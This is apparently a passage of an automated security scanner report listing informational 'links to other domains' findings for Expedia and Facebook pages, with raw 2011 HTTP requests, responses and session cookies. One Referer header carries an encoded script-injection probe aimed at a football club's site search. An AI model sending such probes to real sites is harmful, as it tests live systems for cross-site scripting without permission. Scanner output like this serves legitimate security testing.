Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; p1=`tpid=v.1,1`11; iEAPID=21187; s1=`MH=21187`EAPIsVisible=0`EAPBrandingURL=`EAPBrandingFeature=0`EAPIndustry=Other`EAPName=TripAdvisor`99

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 01:02:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:05 GMT; Path=/
Content-Length: 86924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Service Temporarily Unavailable</title>

       <link
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...
19.186. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...
<noscript>
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u16=USD;u13=4215;u14=429;u11=35;u9=The Boston Park Plaza Hotel & Towers;u7=1|0;u6=1;u4=20111004|20111007;u1=Hotel;u2=178239;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript>                                                                                
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u1=Hotel;u4=20111004|20111007;u2=178239;u6=1;u7=1|0;u9=The Boston Park Plaza Hotel & Towers;u11=35;u13=4215;u14=429;u16=USD;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
</span>
   <img id="staticMap_image" src="http://maps.google.com/staticmap?client=gme-expedia&size=192x136&zoom=14&sensor=false&format=png8&markers=42.35080,-71.07032,red|" width="192" height="136" onload="YAHOO.cx.exp.widget.infosite.StaticMap.showMap()" alt="MAP" />
</div>
...[SNIP]...
<div id="infosite_opinionLab-container">
   <a id="nav-tool-feedback" class="xp-t-bold" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" href="https://secure.opinionlab.com/ccc01/comment_card.asp" target="_top" rel="nofollow">
       Give your feedback to help us make improvements
   </a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...
19.187. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...
19.188. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/exp/core/ChannelTracking.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"15348-1317085613836"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Type: text/javascript
Cteonnt-Length: 15348
Content-Length: 15348
Vary: Accept-Encoding
Cache-Control: private, max-age=37236
Date: Mon, 03 Oct 2011 00:10:39 GMT
Connection: close

//configuration --- can be put into separate file
//first flag indicates clear seoid
//second flag - null indicates check for SEMCID, true is to clear the cookie, false is don't clear the cookie
v
...[SNIP]...
/ footer        
       var footerDiv = document.getElementById('footer');
       var dynamicFooterDiv = document.createElement("div");
       dynamicFooterDiv.id = "msnnzFooterSuffix";
       dynamicFooterDiv.innerHTML = '<iframe scrolling=no frameborder=no style="height:65px; width:992px; border:none; overflow:hidden;" border="0" src="http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer"></iframe>
...[SNIP]...
19.189. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
